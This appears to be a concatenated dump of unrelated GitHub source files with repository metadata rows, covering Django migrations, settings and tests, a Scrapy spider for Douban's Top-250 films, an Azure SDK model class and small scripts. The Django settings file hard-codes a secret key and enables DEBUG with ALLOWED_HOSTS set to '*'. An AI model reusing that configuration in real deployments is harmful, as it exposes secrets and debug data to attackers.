                ('default_phone_number', models.CharField(blank=True, max_length=20, null=True)),
                ('default_street_address1', models.CharField(blank=True, max_length=80, null=True)),
                ('default_street_address2', models.CharField(blank=True, max_length=80, null=True)),
                ('default_town_or_city', models.CharField(blank=True, max_length=40, null=True)),
                ('default_county', models.CharField(blank=True, max_length=80, null=True)),
                ('default_postcode', models.CharField(blank=True, max_length=20, null=True)),
                ('default_country', django_countries.fields.CountryField(blank=True, max_length=2, null=True)),
                # One profile per user; deleting the user deletes the profile.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"shane.hartley06@gmail.com"
] | shane.hartley06@gmail.com |
d481c50dc24610166c81237f91c3468449117087 | 80d28eaa892d0ae8548b88c9e572badceda6a622 | /thief_snapshot/__init__.py | 083a53b381b62b6a3262abc685121ecfc446e79c | [] | no_license | pawl/thief-snapshot | 7affba4e0c05841c573dda5bd07d453bdffad98f | 388660055a78e4719c920cb7db38fdc1cf7b3813 | refs/heads/master | 2020-12-03T09:35:01.714994 | 2017-07-11T02:56:28 | 2017-07-11T02:56:28 | 95,631,500 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | import logging
# Configure the root logger once, when the package is first imported.
_LOG_FORMAT = '%(asctime)s - %(levelname)s - %(message)s'
logging.basicConfig(format=_LOG_FORMAT, level=logging.INFO)

# Package-wide logger instance; submodules may import this directly.
logger = logging.getLogger(__name__)
| [
"paul90brown@gmail.com"
] | paul90brown@gmail.com |
d0e6d6f50ccfb352a8cbc7b6885fe5f5ed7113c5 | 631fefc768f55a1e1973b82f5f5b6dc918463c85 | /resume_parser/resume_parser/settings.py | 13d35b2511db26edea008110a019aacf25403856 | [
"MIT"
] | permissive | gitamitrawat/Resume_parsing | 667857a03a78c55c0b328fe72bbe5e8d8f909e28 | c2dc1e161930538290018b46b55dd038c038b689 | refs/heads/master | 2022-11-27T18:08:07.492212 | 2020-08-09T17:19:09 | 2020-08-09T17:19:09 | 286,257,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | """
Django settings for resume_parser project.
Generated by 'django-admin startproject' using Django 2.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded; for production it should be loaded
# from an environment variable instead of living in source control.
SECRET_KEY = 'fa^pq*c1#+6_(6jgxxr&2o-9bt$5u_f=aldx0yceaed3#c1b^b'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# NOTE(review): '*' accepts requests for any Host header -- fine for local
# development only; restrict before deploying.
ALLOWED_HOSTS = ['*']


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Third-party: bootstrap form rendering.
    'crispy_forms',
    # Local app containing the resume parsing views.
    'parser_app',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'resume_parser.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level template directory in addition to per-app templates.
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'resume_parser.wsgi.application'


# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# SQLite file in the project root; development-only setup.

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/

STATIC_URL = '/staticfiles/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
#STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), ]

# Bootstrap Crispy-Forms config
CRISPY_TEMPLATE_PACK = 'bootstrap4'

# for uploading resume files
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'mediafiles')
MEDIA_URL = '/mediafiles/'

# Unauthenticated users are redirected here by @login_required views.
LOGIN_URL = '/parser_app/user_login/'
| [
"amithunterz@gmail.com"
] | amithunterz@gmail.com |
0d1de5c81041d3e3475be8b17c283a7fa1f2bd06 | f2f2a757faf73bf27caa72beae606a8ce1b2a073 | /app/recipe/tests/test_ingredients_api.py | c8531f44430ae22eebeb986422785600eaa6ac61 | [
"MIT"
] | permissive | rohitmalik137/django-recipe-api | a144e723926da21679149b8fd09c510536c94fb7 | 824f4a48d8f60356881dabb7733270fbdb24c67a | refs/heads/main | 2023-01-14T16:53:59.492563 | 2020-11-26T15:08:28 | 2020-11-26T15:08:28 | 315,214,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Ingredient
from recipe.serializers import IngredientSerializer
INGREDIENTS_URL = reverse('recipe:ingredient-list')
class PublicIngredientsApiTests(TestCase):
    """Behaviour of the ingredients API for anonymous (unauthenticated) clients."""

    def setUp(self):
        self.client = APIClient()

    def test_login_required(self):
        """An unauthenticated request to the list endpoint must be rejected."""
        response = self.client.get(INGREDIENTS_URL)

        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateIngredientsApiTests(TestCase):
    """Behaviour of the ingredients API for an authenticated user."""

    def setUp(self):
        self.user = get_user_model().objects.create_user(
            'test@gmail.com',
            'testpass'
        )
        self.client = APIClient()
        self.client.force_authenticate(self.user)

    def test_retieve_ingredients_list(self):
        """Listing returns every stored ingredient, sorted by name descending."""
        for ingredient_name in ('test1', 'test2'):
            Ingredient.objects.create(user=self.user, name=ingredient_name)

        response = self.client.get(INGREDIENTS_URL)

        queryset = Ingredient.objects.all().order_by('-name')
        expected = IngredientSerializer(queryset, many=True)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data, expected.data)

    def test_ingredients_limited_to_user(self):
        """Only ingredients owned by the authenticated user are returned."""
        other_user = get_user_model().objects.create_user(
            'other@gmail.com',
            'testpass2'
        )
        Ingredient.objects.create(user=other_user, name='Vineger')
        mine = Ingredient.objects.create(user=self.user, name='soming')

        response = self.client.get(INGREDIENTS_URL)

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data), 1)
        self.assertEqual(response.data[0]['name'], mine.name)

    def test_create_ingredients_successful(self):
        """POSTing a valid name persists a new ingredient for this user."""
        payload = {'name': 'Test ingredient'}
        self.client.post(INGREDIENTS_URL, payload)

        created = Ingredient.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertTrue(created)

    def test_creating_tag_invalid(self):
        """POSTing an empty name is rejected with HTTP 400."""
        response = self.client.post(INGREDIENTS_URL, {'name': ''})

        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| [
"bpsrohitmalik@gmail.com"
] | bpsrohitmalik@gmail.com |
3e7f1c6c83a028d02680995ae90412fcde342d37 | 464068d69e461d5d21cf5cb15d470aabb024ae42 | /Logan Yang - Guessgame.py | 5da8a0a24fccdaad5677840b93831ef0b7bd39d3 | [] | no_license | 5q4z/CSE | c6c7c939dad186971920880524f2c6cc7271e393 | 977128f87defe8786345390a1fbad958057f1b7f | refs/heads/master | 2021-09-14T23:04:37.002028 | 2018-05-21T18:41:15 | 2018-05-21T18:41:15 | 112,374,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | import random
# Logan Yang
# Guess-the-number game: the player gets 5 attempts at a random number in 1-50.
a = random.randint(1, 50)
for _ in range(5):
    b = input("What number am I thinking of? ")
    try:
        guess = int(b)
    except ValueError:
        # Non-numeric input previously fell through to a meaningless
        # lexicographic comparison; prompt again instead (still uses a turn,
        # matching the original attempt count).
        print("Please enter a whole number.")
        continue
    if guess == a:
        print("Correct!")
        break
    elif guess < a:
        # Bug fix: compare as integers. The original compared the strings,
        # so e.g. a guess of "10" against 9 was told to "guess higher".
        print("Incorrect, guess higher.")
    else:
        print("Incorrect, guess lower.")
| [
"5q4z@github.com"
] | 5q4z@github.com |
20bdfeb6ea32876cb80e95e2bed12def7f5c0cb3 | be8211ea410f91589307044a054c01948a594d54 | /M1T1_saunders.py | 62ab3f5e90a13d327064608e11250ecfef2171b8 | [] | no_license | saunderl6368/CTI110 | afa1be65c6d5c89816d26cc59a7e3907bee3cfa1 | e09507795e50f738fdf767cd97c620a905e02223 | refs/heads/master | 2021-01-22T06:49:10.727820 | 2017-12-10T22:52:19 | 2017-12-10T22:52:19 | 102,300,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | #M1T1
# Hello World
# Laura Saunders
# 8/26/2017

# Emit the traditional first-program greeting to standard output.
greeting = "Hello World"
print(greeting)
| [
"noreply@github.com"
] | saunderl6368.noreply@github.com |
88c5efb5087541c82352cb73f2b1bcf7caf3e68b | 64a04102f0240c46bd56973d783ebf3cf02b4299 | /doubanMovie250/spiders/doubanMovie250_spider.py | 72eacbd40a96f3bda4c418d5932c06786cc586d4 | [] | no_license | mokusolo/doubanMovie250 | 81e0f54dfd7f659e607c87a86dc9415eb1028675 | ffdd6f8411dfc08524cfb57bb1ebb1400a4bed3e | refs/heads/master | 2021-05-14T00:11:24.484952 | 2018-03-07T04:21:57 | 2018-03-07T04:21:57 | 116,534,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | import scrapy
from doubanMovie250.items import Doubanmovie250Item
class DoubanMovie250Spider(scrapy.Spider):
    """Scrape ranking, title, score and quote for Douban's Top-250 movie list."""
    name = 'doubanMovie250'
    # Desktop Chrome User-Agent attached to every request (presumably because
    # the site rejects the default scrapy agent -- confirm).
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
    }

    # Use start_requests() instead of `start_urls = ['https://movie.douban.com/top250']`
    # to gain more control over the initial request -- e.g. attaching the
    # User-Agent request header above.
    def start_requests(self):
        url = 'https://movie.douban.com/top250'
        yield scrapy.Request(url, headers=self.headers)

    def parse(self, response):
        """Yield one item per movie on the page, then follow the next page link."""
        # NOTE(review): a single Item instance is reused and mutated across
        # iterations; safe only if downstream consumes each yield eagerly.
        item = Doubanmovie250Item()
        movies = response.xpath('//ol[@class="grid_view"]/li')
        for movie in movies:
            # NOTE(review): extract()[0] raises IndexError if a node is
            # missing; `quote` alone is kept as a list -- confirm intended.
            item['ranking'] = movie.xpath('.//div[@class="pic"]/em/text()').extract()[0]
            item['title'] = movie.xpath('.//div[@class="hd"]/a/span[1]/text()').extract()[0]
            item['score'] = movie.xpath('.//div[@class="star"]/span[@class="rating_num"]/text()').extract()[0]
            item['quote'] = movie.xpath('.//p[@class="quote"]/span/text()').extract()
            yield item
        # Pagination: the "next" link is relative; absent on the last page.
        next_url = response.xpath('//span[@class="next"]/a/@href').extract()
        if next_url:
            next_url = 'https://movie.douban.com/top250' + next_url[0]
            yield scrapy.Request(next_url, headers=self.headers)
| [
"liyundan3@gmail.com"
] | liyundan3@gmail.com |
b57127734749739690a92ea4af6da4fa3a1d9bd5 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-storage/azure/mgmt/storage/v2017_06_01/models/sku_py3.py | 8bb382d6481045d2cc41fe140e170b08d4bbffa6 | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 3,319 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
# Generated by AutoRest (see file header); hand edits will be lost on
# regeneration.
class Sku(Model):
    """The SKU of the storage account.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param name: Required. Gets or sets the sku name. Required for account
     creation; optional for update. Note that in older versions, sku name was
     called accountType. Possible values include: 'Standard_LRS',
     'Standard_GRS', 'Standard_RAGRS', 'Standard_ZRS', 'Premium_LRS'
    :type name: str or ~azure.mgmt.storage.v2017_06_01.models.SkuName
    :ivar tier: Gets the sku tier. This is based on the SKU name. Possible
     values include: 'Standard', 'Premium'
    :vartype tier: str or ~azure.mgmt.storage.v2017_06_01.models.SkuTier
    :ivar resource_type: The type of the resource, usually it is
     'storageAccounts'.
    :vartype resource_type: str
    :ivar kind: Indicates the type of storage account. Possible values
     include: 'Storage', 'BlobStorage'
    :vartype kind: str or ~azure.mgmt.storage.v2017_06_01.models.Kind
    :ivar locations: The set of locations that the SKU is available. This will
     be supported and registered Azure Geo Regions (e.g. West US, East US,
     Southeast Asia, etc.).
    :vartype locations: list[str]
    :ivar capabilities: The capability information in the specified sku,
     including file encryption, network acls, change notification, etc.
    :vartype capabilities:
     list[~azure.mgmt.storage.v2017_06_01.models.SKUCapability]
    :param restrictions: The restrictions because of which SKU cannot be used.
     This is empty if there are no restrictions.
    :type restrictions:
     list[~azure.mgmt.storage.v2017_06_01.models.Restriction]
    """

    # Read-only fields are server-populated and must not be sent in requests.
    _validation = {
        'name': {'required': True},
        'tier': {'readonly': True},
        'resource_type': {'readonly': True},
        'kind': {'readonly': True},
        'locations': {'readonly': True},
        'capabilities': {'readonly': True},
    }

    # Maps Python attribute names to wire-format keys and msrest types.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'SkuName'},
        'tier': {'key': 'tier', 'type': 'SkuTier'},
        'resource_type': {'key': 'resourceType', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'Kind'},
        'locations': {'key': 'locations', 'type': '[str]'},
        'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
        'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
    }

    def __init__(self, *, name, restrictions=None, **kwargs) -> None:
        """Keyword-only constructor; read-only fields start as None until the service fills them."""
        super(Sku, self).__init__(**kwargs)
        self.name = name
        self.tier = None
        self.resource_type = None
        self.kind = None
        self.locations = None
        self.capabilities = None
        self.restrictions = restrictions
| [
"lmazuel@microsoft.com"
] | lmazuel@microsoft.com |
daa712434a43b1506008cb02c38d0182d39483c2 | b9c55de2b21ca781ab5522da8a1db34ed55bd644 | /django-app/member/urls.py | cee47f79b216288c4dad0072c53238b1df7520be | [] | no_license | JeongEuiJin/model-wed-p | 04a8ed2aa8145a860e214c563fcebae9d7e39692 | 9fb987f5fe65c05825c519d6ef4bd4d802e0dccb | refs/heads/master | 2021-01-21T21:05:07.169721 | 2017-06-19T12:11:51 | 2017-06-19T12:11:51 | 94,772,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django.conf.urls import url
from . import views
# Routes for the member app:
#   ''        -> student_list  (index listing all students)
#   '<s_pk>/' -> student_del   (acts on the student with primary key s_pk)
urlpatterns = [
    url(r'^$', views.student_list, name='student_list'),
    url(r'^(?P<s_pk>\d+)/$', views.student_del, name='student_del')
]
| [
"hehar1020@gmail.com"
] | hehar1020@gmail.com |
e789385cd300ec837af0be820f02f87154600e1d | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /test/test_remote_app_permission_update_user.py | 45ffee2297dddce630ab3389a4f5adc204e15ffc | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
OpenAPI spec version: v1
Contact: support@fit2cloud.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.remote_app_permission_update_user import RemoteAppPermissionUpdateUser # noqa: E501
from swagger_client.rest import ApiException
# Swagger-codegen test stub: generated placeholder awaiting real assertions.
class TestRemoteAppPermissionUpdateUser(unittest.TestCase):
    """RemoteAppPermissionUpdateUser unit test stubs"""

    def setUp(self):
        # No fixtures needed yet; placeholder from the code generator.
        pass

    def tearDown(self):
        pass

    def testRemoteAppPermissionUpdateUser(self):
        """Test RemoteAppPermissionUpdateUser"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.remote_app_permission_update_user.RemoteAppPermissionUpdateUser()  # noqa: E501
        pass
# Allow running this test module directly as well as via a test runner.
if __name__ == '__main__':
    unittest.main()
| [
"ibuler@qq.com"
] | ibuler@qq.com |
206496e68457d695272df25a30ed14016edc1773 | 974e10010df9a2f0696a021f6858be409848ea16 | /douban/movie/migrations/0001_initial.py | 85e0cf3e109a69a5ef364d256cbad9d39d627a30 | [] | no_license | ssn9400/tango_with_django | ed7e4cb489e50dcd104129dfbf001cb27a482139 | 73bf7cf59af97873e03a077508694234c92f6786 | refs/heads/master | 2020-09-18T19:30:18.537014 | 2019-11-26T11:53:43 | 2019-11-26T11:53:43 | 224,176,505 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,142 | py | # Generated by Django 2.1.14 on 2019-11-26 06:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuthGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
options={
'db_table': 'auth_group',
'managed': False,
},
),
migrations.CreateModel(
name='AuthGroupPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_group_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='AuthPermission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('codename', models.CharField(max_length=100)),
],
options={
'db_table': 'auth_permission',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128)),
('last_login', models.DateTimeField(blank=True, null=True)),
('is_superuser', models.BooleanField()),
('username', models.CharField(max_length=150, unique=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=150)),
('email', models.CharField(max_length=254)),
('is_staff', models.BooleanField()),
('is_active', models.BooleanField()),
('date_joined', models.DateTimeField()),
],
options={
'db_table': 'auth_user',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserGroups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_groups',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserUserPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_user_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoAdminLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField()),
('object_id', models.TextField(blank=True, null=True)),
('object_repr', models.CharField(max_length=200)),
('action_flag', models.SmallIntegerField()),
('change_message', models.TextField()),
],
options={
'db_table': 'django_admin_log',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoContentType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
],
options={
'db_table': 'django_content_type',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoMigrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app', models.CharField(max_length=255)),
('name', models.CharField(max_length=255)),
('applied', models.DateTimeField()),
],
options={
'db_table': 'django_migrations',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoSession',
fields=[
('session_key', models.CharField(max_length=40, primary_key=True, serialize=False)),
('session_data', models.TextField()),
('expire_date', models.DateTimeField()),
],
options={
'db_table': 'django_session',
'managed': False,
},
),
migrations.CreateModel(
name='Actor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('actor', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'actor',
'managed': True,
},
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'country',
'managed': True,
},
),
migrations.CreateModel(
name='Director',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('director', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'director',
'managed': True,
},
),
migrations.CreateModel(
name='Editor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('editor', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'editor',
'managed': True,
},
),
migrations.CreateModel(
name='Kind',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kind', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'kind',
'managed': True,
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'language',
'managed': True,
},
),
migrations.CreateModel(
name='Movie',
fields=[
('movie_name', models.CharField(max_length=255, primary_key=True, serialize=False)),
('director', models.CharField(blank=True, max_length=255, null=True)),
('editor', models.CharField(blank=True, max_length=255, null=True)),
('actor', models.CharField(blank=True, max_length=255, null=True)),
('kind', models.CharField(blank=True, max_length=255, null=True)),
('country', models.CharField(blank=True, max_length=255, null=True)),
('language', models.CharField(blank=True, max_length=255, null=True)),
('release_date', models.CharField(blank=True, max_length=255, null=True)),
('runtime', models.CharField(blank=True, max_length=255, null=True)),
('nickname', models.CharField(blank=True, max_length=255, null=True)),
('imdb', models.CharField(blank=True, db_column='IMDb', max_length=255, null=True)),
('rating_num', models.FloatField(blank=True, null=True)),
('votes', models.FloatField(blank=True, null=True)),
],
options={
'db_table': 'movie',
'managed': True,
},
),
migrations.CreateModel(
name='movieinfo',
fields=[
('movie_name', models.CharField(max_length=255, primary_key=True, serialize=False)),
('release_date', models.CharField(blank=True, max_length=255, null=True)),
('runtime', models.CharField(blank=True, max_length=255, null=True)),
('nickname', models.CharField(blank=True, max_length=255, null=True)),
('imdb', models.CharField(blank=True, db_column='IMDb', max_length=255, null=True)),
('rating_num', models.FloatField(blank=True, null=True)),
('votes', models.FloatField(blank=True, null=True)),
],
options={
'db_table': 'movieinfo',
'managed': True,
},
),
]
| [
"940091548@qq.com"
] | 940091548@qq.com |
2fafa7209aecd8c1e4b79ff259093980bd081564 | b9a73fe404ee30baf8a88276030363ad2d1d4cc5 | /old/BRNN_Gap/eval.py | d8cfef3415e874b7220fbd604a5df6822553a2ff | [] | no_license | everglowing/Language-Models | 06da6befceef9b4fd1f43ba7d6708fcf8862f715 | 67db3fc5d0b0ef099cac306bd78294764d3587cf | refs/heads/master | 2021-01-13T04:12:41.341299 | 2016-12-27T18:53:24 | 2016-12-27T18:53:24 | 77,684,222 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | from __future__ import print_function
import numpy as np
import tensorflow as tf
import argparse
import codecs
import time
import os
from six.moves import cPickle
from utils import TextLoader
from model import Model
from six import text_type
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type=str, default='save',
help='model directory to store checkpointed models')
parser.add_argument('--text', type=str,
help='filename of text to evaluate on')
args = parser.parse_args()
eval(args)
def eval(args):
with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:
saved_args = cPickle.load(f)
saved_args.batch_size = 1
saved_args.seq_length = 200
with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:
chars, vocab = cPickle.load(f)
model = Model(saved_args, infer=False, evaluation=True)
with codecs.open(args.text, 'r', encoding='utf-8') as f:
text = f.read()
with tf.Session() as sess:
tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
ckpt = tf.train.get_checkpoint_state(args.save_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
ppl = model.eval(sess, chars, vocab, text)
print('perplexity: {0}'.format(ppl))
if __name__ == '__main__':
main()
| [
"kalpeshk2011@gmail.com"
] | kalpeshk2011@gmail.com |
cedcb016825d6154f200e7ccfe1d53847c674bb6 | 9512f329d9326ed0b9436202947de9eee0c6c387 | /Cap07-estruturas_de_repeticao/for_03.py | dcfe65ac3989ce9551d9ca9f6b3a0ccdf9f82056 | [] | no_license | frclasso/CodeGurus_Python_mod1-turma1_2019 | 9fffd76547256ac480db41536223682a5b152944 | e34d60498ee45566dbf1182551d91250a9aab272 | refs/heads/master | 2020-04-30T02:01:50.757611 | 2019-06-10T15:38:58 | 2019-06-10T15:38:58 | 176,546,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # loop aninhado
lot_2D = [
['Toyota', 'Audi', 'BMW'],
['Lexus', 'Jeep'],
['Honda', 'Kia', 'Mazda']
]
#print(lot_2D[0][0]) # lista 0 , elemento 0 da lista 0
# for linha in lot_2D:
# for carro in linha:
# print(carro)
lot_3D =[
[
['Tesla', 'Fiat', 'BMW'],
['Honda', 'Jeep'],
['Saab','Kia', 'Ford']
],
[
['Subaru', 'Nissan'],
['Volkswagen'],
['Mercedez']
],
[
['Chevrolet', 'GMC'],
['Ferrari', 'Lamborghini']
]
]
#print(lot_3D[0])
# print(lot_3D[0][0])
#print(lot_3D[0][0][1])
for grupo in lot_3D:
for line in grupo:
for carro in line:
print(carro) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
d79a6922f9637b01f6fde1a85cd15c4482f4ecc7 | 7da9f5979aaaadd44f9420fbd49653683b3d2ce8 | /ablog/theblog/admin.py | a711da020883ca654ea31ed754d3e24b1939145b | [] | no_license | SanjoyPator1/BlogProjectDjango | 7bde566098b249cfa073cab62e69dcb3f5a8954a | f4ea7a5fa0b4ba10b3a6657c553720ce8ffe22c8 | refs/heads/main | 2023-07-13T19:10:55.157433 | 2021-08-28T10:02:03 | 2021-08-28T10:02:03 | 391,609,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from django.contrib import admin
from .models import Post, Category, Privacy
from django_summernote.admin import SummernoteModelAdmin
#summernote
class PostAdmin(SummernoteModelAdmin):
summernote_fields = ('body',)
# Register your models here.
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Privacy)
| [
"sanjoy18-378@aec.ac.in"
] | sanjoy18-378@aec.ac.in |
2b7ca6930d7a261e1163001b2f4c95bfa52cba9d | 87ea41eb5df699439196eefb92501b2db5ffde08 | /func_2.py | 8024b9dbe5f72a1c01efc1261dcc2e46113de7c8 | [] | no_license | Marco-Colombi/Homework-5-ADM | aea42c18a737ad179e0986aed371691b05ed6e94 | 4c8123be9a94e1459e00967a54ce9f504f2c18d3 | refs/heads/master | 2020-11-27T22:16:41.344710 | 2019-12-22T22:57:50 | 2019-12-22T22:57:50 | 229,623,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,048 | py | # -*- coding: utf-8 -*-
"""
